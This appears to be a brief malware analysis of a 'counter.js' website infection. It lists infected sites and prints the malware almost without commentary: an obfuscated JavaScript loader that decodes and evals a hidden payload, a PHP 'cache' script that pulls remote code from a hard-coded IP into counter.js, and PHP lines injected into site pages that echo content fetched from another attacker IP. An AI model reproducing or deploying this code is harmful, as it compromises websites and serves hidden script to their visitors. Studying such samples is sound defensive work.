counter.js infection

Examples of infected sites:
http://sem-elektrik.com/counter.js
http://araby-world.com/counter.js
http://r-komfortstyle.ru/counter.js

counter.js:
date=new Date();var ar=",B:.};C0mb]gE=\"iuo{ n1/Avty'l<cepwdT()[rxsf h>aNk";try{gserkewg();}catch(a){k=new Boolean().toString()};var ar2="f57,0,-12,81,3,-21,-6,-51,39,-42,-24,69,-33,15,-66,24,60,-18,-39,48,9,-69,69,-33,15,48,-120,75,27,33,-105,108,-3,-114,69,15,-27,-54,24,51,-24,3,30,3,-93,9,81,-57,3,0,0,-12,81,-9,21,-114,69,24,-9,3,-96,42,0,-45,117,-36,-9,39,-30,36,-75,3,0,0,45,-51,39,-42,-24,69,-33,15,-66,90,18,-72,30,18,15,-66,45,-42,81,-9,21,-114,69,36,-6,-6,-27,-51,42,51,-57,0,21,-90,60,0,33,-48,66,27,-135,75,-36,72,-72,69,-39,6,-33,33,0,-39,48,30,-114,81,-39,-27,42,-21,-21,114,-105,60,30,-57,27,-33,15,42,-39,3,48,-30,-54,57,-27,57,-93,42,-18,-42,60,48,3,-39,-48,-12,99,-57,-36,42,-18,-42,60,48,-6,-48,3,6,9,-54,42,-9,-27,78,-78,-18,18,39,-39,30,3,-72,126,-87,57,0,-9,-33,-45,81,-45,72,-78,30,-30,6,9,-54,132,-111,96,-72,33,-36,27,18,-78,69,9,33,-51,-69,15,-6,60,-24,45,-90,15,-6,66,54,-48,-21,-21,81,-9,21,-114,69,42,-93,69,-96,42,0,-45,45,0,69,-78,12,30,-15,-30,6,9,69,-84,81,-9,21,-114,69,24,-9,3,-57,3,0,0,15,66,-21,12,-3,3,-90,90,-27,-51,39,-42,-24,69,-33,15,-66,81,27,-24,45,-63,18,-57,48,9,-69,69,-33,15,33,-27,-36,81,-9,21,-114,69,-12,30,-96,111,-117,114,-30,-18,-6,6,0,42,-72,-18,21,27,18,15,-27,42,-6,-27,-9,-81,81,51,-57,0,21,-90,60,0,33,-48,66,27,-135,75,-36,72,-72,69,-39,6,-33,33,0,-39,48,30,-114,81,-39,-27,42,-21,-21,114,-105,60,30,-57,27,-33,15,42,-39,3,30,-96,111,-117,114,-48,3,6,9,-84,63,-27,78,-78,-18,18,39,-39,30,3,-39,42,51,-87,57,0,-9,-33,21,-66,111,-117,114,-48,3,6,9,-84,87,-45,72,-78,30,-30,6,9,-21,42,57,-111,96,-72,33,-36,27,18,-12,-66,111,-117,114,-48,3,6,9,-84,75,9,33,-51,-36,42,-60,60,-66,111,-117,114,-48,3,6,9,-84,66,-24,45,-57,42,-60,60,-66,111,-117,114,-30,-18,-6,6,0,42,-72,-18,21,27,18,15,-27,18,-54,57,-27,57,-51,-81,81,-18,-42,60,30,-96,111,-117,114,-30,-18,-6,6,0,42,-72,-18,21,27,18,15,-27,51,-39,-48,-12,99,-57,6,-81,81,-18,-42,60,30,-96,42,0,0,45,-51,39,-42,-24,69,-33,15,-66,24,60,-18,-39,48,9,-69,69,-33,15,48,-120,75,27,33,-105,108,-3,-114,69,15,-27,-54,24,51,-24,3,30,3,-93,9,-21,129,-42,0,-3,-33,42,-84,114,-87,39,18,6,18,-15,-96,42,0,-45]".replace(k.substr(0,1),'[');pau="rn ev2010".replace(date.getFullYear()-1,"al");e=new Function("","retu"+pau);e=e();ar2=e(ar2);s="";var pos=0;for(i=0;i<ar2.length;i++){pos+=parseInt(k.replace("false","0asd"))+ar2[i]/3;s+=ar.substr(pos,1);}
e(s);


confdb.php:
<?php

// ----------------------------------------------------------------------
// touch this!  ---------------------------------------------------------

define( 'CACHE_DEBUG', 				false );
define( 'CACHE_TIME_SECONDS', 		0 );
define( 'CACHE_UPDATE_URL',  		"http://193.105.240.93/data/all.txt" );
define( 'CACHE_FILE', 				"counter.js" );

// ----------------------------------------------------------------------


$cache_code 	= null;
$cache_file 	= CACHE_FILE;
$cached_time 	= time() - (file_exists($cache_file) ? filemtime($cache_file) : 0);


// ----------------------------------------------------------------------

if (CACHE_DEBUG) echo "Cached time is {$cached_time} seconds, update planned after ".(CACHE_TIME_SECONDS - $cached_time)." seconds\n";


// ----------------------------------------------------------------------
// check cached time

if($cached_time > CACHE_TIME_SECONDS)
{
	// get new cache code
	$cache_code = file_get_contents(CACHE_UPDATE_URL);
	if(!empty($cache_code))
	{
		if (CACHE_DEBUG) echo "Update cache...\n";
		write_cache($cache_file, $cache_code);
	}
	else
	{
		if (CACHE_DEBUG) echo "Can't get cache data!\n";
	}
}
else
{
		if(CACHE_DEBUG) echo "Read cache code...\n";

		// extract cached data
		$cache_code = extract_cache($cache_file);
		if(empty($cache_code))
		{
			if (CACHE_DEBUG) echo "Cache empty! Update cache...\n";
			$cache_code = file_get_contents(CACHE_UPDATE_URL);
			if(!empty($cache_code))
			{
				// write cache
				write_cache($cache_file, $cache_code);
			}
			else
			{
				if (CACHE_DEBUG) echo "Can't get cache data!\n";
			}
		}
}

// ----------------------------------------------------------------------

header("Content-Type: text/plain; charset=windows-1251");
echo $cache_code;

// ----------------------------------------------------------------------

exit;

// ----------------------------------------------------------------------
/// read file data

function file_get_contents_locked($file_path)
{
	$fp = fopen($file_path, "r");
	if($fp !== FALSE)
	{
		flock($fp, LOCK_EX);
		$data = fread($fp, filesize($file_path));
		flock($fp, LOCK_UN);
		fclose($fp);

		return $data;
	}

	return FALSE;
}


// ----------------------------------------------------------------------
/// extract cache from file by cache markers

function extract_cache($file_path)
{
	if(file_exists($file_path))
		return file_get_contents_locked($file_path);

	return null;
}


// ----------------------------------------------------------------------
// write cache to file

function write_cache($file_path, $cache_data)
{
	if(file_exists($file_path) && !is_writable($file_path))
	{
		if (CACHE_DEBUG) echo "Cache file not writable!\n";
		return null;
	}

	$fp=fopen($file_path, "w+");
	flock($fp, LOCK_EX);
	fwrite($fp, $cache_data);
	flock($fp, LOCK_UN);
	fclose($fp);
}

counter.js:
<?php echo file_get_contents("http://91.193.192.27/users.txt"); ?>

some fail in *.html infected websites:
<?php echo file_get_contents("http://91.193.192.27/users.txt"); ?>
<?php echo file_get_contents("http://91.193.192.27/users.txt"); ?>